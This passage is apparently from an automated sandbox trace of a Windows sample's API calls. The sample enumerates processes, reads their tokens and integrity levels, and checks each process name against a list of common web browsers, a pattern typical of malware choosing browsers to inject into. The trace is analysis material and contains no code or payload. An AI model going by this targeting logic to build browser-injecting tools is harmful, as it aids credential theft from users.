ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.014] GetLastError () returned 0x7a [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.014] CloseHandle (hObject=0xb8) returned 1 [0225.014] CloseHandle (hObject=0xb4) returned 1 [0225.014] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.014] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x810) returned 0xb4 [0225.014] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x166fa8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.014] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.014] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.015] GetLastError () returned 0x7a [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.015] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.015] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.015] CloseHandle (hObject=0xb8) returned 1 [0225.015] CloseHandle (hObject=0xb4) returned 1 [0225.015] lstrcmpiW (lpString1="firefox.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0225.015] lstrcmpiW (lpString1="chrome.exe", lpString2="filesdetectedlosebenjamin.exe") returned -1 [0225.015] lstrcmpiW (lpString1="opera.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0225.015] lstrcmpiW (lpString1="iexplore.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0225.015] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0225.015] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="filesdetectedlosebenjamin.exe") returned 1 [0225.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0225.015] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.015] GetLastError () returned 0x7a [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.015] CloseHandle (hObject=0xb8) returned 1 [0225.015] CloseHandle (hObject=0xb4) returned 1 [0225.015] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x820) returned 0xb4 [0225.015] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1670b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.015] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.015] GetLastError () returned 0x7a [0225.015] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.015] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.015] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.015] CloseHandle (hObject=0xb8) returned 1 [0225.015] CloseHandle (hObject=0xb4) returned 1 [0225.015] lstrcmpiW (lpString1="firefox.exe", lpString2="cincinnati consumers se.exe") returned 1 [0225.015] lstrcmpiW (lpString1="chrome.exe", lpString2="cincinnati consumers se.exe") returned -1 [0225.015] lstrcmpiW (lpString1="opera.exe", lpString2="cincinnati consumers se.exe") returned 1 [0225.015] lstrcmpiW (lpString1="iexplore.exe", lpString2="cincinnati consumers se.exe") returned 1 [0225.015] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="cincinnati consumers se.exe") returned 1 [0225.015] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="cincinnati consumers se.exe") returned 1 [0225.015] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0225.015] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.016] GetLastError () returned 0x7a [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.016] CloseHandle (hObject=0xb8) returned 1 [0225.016] CloseHandle (hObject=0xb4) returned 1 [0225.016] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x838) returned 0xb4 [0225.016] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1671f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.016] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.016] GetLastError () returned 0x7a [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.016] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.016] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.016] CloseHandle (hObject=0xb8) returned 1 [0225.016] CloseHandle (hObject=0xb4) returned 1 [0225.016] lstrcmpiW (lpString1="firefox.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] lstrcmpiW (lpString1="chrome.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] lstrcmpiW (lpString1="opera.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] lstrcmpiW (lpString1="iexplore.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="simply_wa_thumbnail_programmers.exe") returned -1 [0225.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0225.016] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.016] GetLastError () returned 0x7a [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.016] CloseHandle (hObject=0xb8) returned 1 [0225.016] CloseHandle (hObject=0xb4) returned 1 [0225.016] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.016] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x848) returned 0xb4 [0225.016] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167320, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.016] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.016] GetLastError () returned 0x7a [0225.016] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.017] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.017] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.017] CloseHandle (hObject=0xb8) returned 1 [0225.017] CloseHandle (hObject=0xb4) returned 1 [0225.017] lstrcmpiW (lpString1="firefox.exe", lpString2="medicaid.exe") returned -1 [0225.017] lstrcmpiW (lpString1="chrome.exe", lpString2="medicaid.exe") returned -1 [0225.017] lstrcmpiW (lpString1="opera.exe", lpString2="medicaid.exe") returned 1 [0225.017] lstrcmpiW (lpString1="iexplore.exe", lpString2="medicaid.exe") returned -1 [0225.017] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="medicaid.exe") returned 1 [0225.017] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="medicaid.exe") returned 1 [0225.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0225.017] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.017] GetLastError () returned 0x7a [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.017] CloseHandle (hObject=0xb8) returned 1 [0225.017] CloseHandle (hObject=0xb4) returned 1 [0225.017] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x858) returned 0xb4 [0225.017] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167460, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.017] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.017] GetLastError () returned 0x7a [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.017] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.017] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.017] CloseHandle (hObject=0xb8) returned 1 [0225.017] CloseHandle (hObject=0xb4) returned 1 [0225.017] lstrcmpiW (lpString1="firefox.exe", lpString2="gateway.exe") returned -1 [0225.017] lstrcmpiW (lpString1="chrome.exe", lpString2="gateway.exe") returned -1 [0225.017] lstrcmpiW (lpString1="opera.exe", lpString2="gateway.exe") returned 1 [0225.017] lstrcmpiW (lpString1="iexplore.exe", lpString2="gateway.exe") returned 1 [0225.017] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="gateway.exe") returned 1 [0225.017] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="gateway.exe") returned 1 [0225.017] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0225.017] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.017] GetLastError () returned 0x7a [0225.017] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.018] CloseHandle (hObject=0xb8) returned 1 [0225.018] CloseHandle (hObject=0xb4) returned 1 [0225.018] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x870) returned 0xb4 [0225.018] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167578, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.018] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.018] GetLastError () returned 0x7a [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.018] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.018] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.018] CloseHandle (hObject=0xb8) returned 1 [0225.018] CloseHandle (hObject=0xb4) returned 1 [0225.018] lstrcmpiW (lpString1="firefox.exe", lpString2="laden.exe") returned -1 [0225.018] lstrcmpiW (lpString1="chrome.exe", lpString2="laden.exe") returned -1 [0225.018] lstrcmpiW (lpString1="opera.exe", lpString2="laden.exe") returned 1 [0225.018] lstrcmpiW (lpString1="iexplore.exe", lpString2="laden.exe") returned -1 [0225.018] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="laden.exe") returned 1 [0225.018] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="laden.exe") returned 1 [0225.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0225.018] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.018] GetLastError () returned 0x7a [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.018] CloseHandle (hObject=0xb8) returned 1 [0225.018] CloseHandle (hObject=0xb4) returned 1 [0225.018] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.018] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x880) returned 0xb4 [0225.018] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167688, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.018] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.018] GetLastError () returned 0x7a [0225.018] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.018] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.018] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.018] CloseHandle (hObject=0xb8) returned 1 [0225.018] CloseHandle (hObject=0xb4) returned 1 [0225.019] lstrcmpiW (lpString1="firefox.exe", lpString2="lying-yourself.exe") returned -1 [0225.019] lstrcmpiW (lpString1="chrome.exe", lpString2="lying-yourself.exe") returned -1 [0225.019] lstrcmpiW (lpString1="opera.exe", lpString2="lying-yourself.exe") returned 1 [0225.019] lstrcmpiW (lpString1="iexplore.exe", lpString2="lying-yourself.exe") returned -1 [0225.019] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="lying-yourself.exe") returned 1 [0225.019] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="lying-yourself.exe") returned 1 [0225.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0225.019] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.019] GetLastError () returned 0x7a [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.019] CloseHandle (hObject=0xb8) returned 1 [0225.019] CloseHandle (hObject=0xb4) returned 1 [0225.019] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x890) returned 0xb4 [0225.019] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167798, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 